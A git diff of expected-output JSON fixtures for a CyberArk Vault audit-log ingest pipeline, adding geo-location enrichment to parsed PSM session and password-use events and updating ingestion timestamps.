System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", 
@@ -1458,17 +1620,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1544,7 +1724,7 @@ "event": { "severity": 2, "duration": 6000000000, - "ingested": "2021-12-09T13:36:49.813838800Z", + "ingested": "2021-12-14T14:42:15.678834901Z", "original": "\u003c5\u003e1 2021-03-15T14:08:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:11\",\"IsoTimestamp\":\"2021-03-15T14:08:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", 
@@ -1568,17 +1748,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1663,7 +1861,7 @@ "event": { "severity": 2, "duration": 9000000000, - "ingested": "2021-12-09T13:36:49.813844200Z", + "ingested": "2021-12-14T14:42:15.678835289Z", "original": "\u003c5\u003e1 2021-03-15T14:08:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:36\",\"IsoTimestamp\":\"2021-03-15T14:08:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "302", "kind": "event", @@ -1687,17 +1885,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1782,7 +1998,7 @@ "event": { "severity": 2, "duration": 2952000000000, - "ingested": "2021-12-09T13:36:49.813849500Z", + "ingested": "2021-12-14T14:42:15.678835667Z", "original": "\u003c5\u003e1 2021-03-15T15:00:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:00:21\",\"IsoTimestamp\":\"2021-03-15T15:00:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "302", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json index a67cff14a59..e6d6e6d9ddd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-304-psm-upload-recording.log-expected.json 
@@ -65,7 +65,7 @@ "event": { "severity": 2, "action": "psm upload recording", - "ingested": "2021-12-09T13:36:52.241443500Z", + "ingested": "2021-12-14T14:42:18.683778092Z", "original": "\u003c5\u003e1 2021-03-25T09:20:56Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 05:20:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T09:20:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e304\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Upload Recording\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_COMP01\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Upload Recording\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Upload Recording\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 
05:20:56\",\"IsoTimestamp\":\"2021-03-25T09:20:56Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"304\",\"Desc\":\"PSM Upload Recording\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_COMP01\",\"Action\":\"PSM Upload Recording\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"Root\\\\a4636750-50a2-492e-984c-e08743d8a883.SSH.txt\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"DstHost=rhel7.cybr.com;LogonAccount=logon;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:46;SessionID=a4636750-50a2-492e-984c-e08743d8a883;SrcHost=127.0.0.1;User=root;\",\"Message\":\"PSM Upload Recording\",\"GatewayStation\":\"\"}}}", "code": "304", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json index 7960201337d..8580c8fa481 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json 
@@ -75,7 +75,7 @@ "event": { "severity": 2, "reason": "(Action: Connect)", - "ingested": "2021-12-09T13:36:52.374483400Z", + "ingested": "2021-12-14T14:42:18.814507071Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" 
Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"308\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating 
System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "308", "kind": "event", @@ -100,10 +100,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -175,7 +184,7 @@ "event": { "severity": 2, "reason": "fun and profit", - "ingested": "2021-12-09T13:36:52.374492200Z", + "ingested": "2021-12-14T14:42:18.814509300Z", "original": "\u003c5\u003e1 2021-03-11T17:38:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n 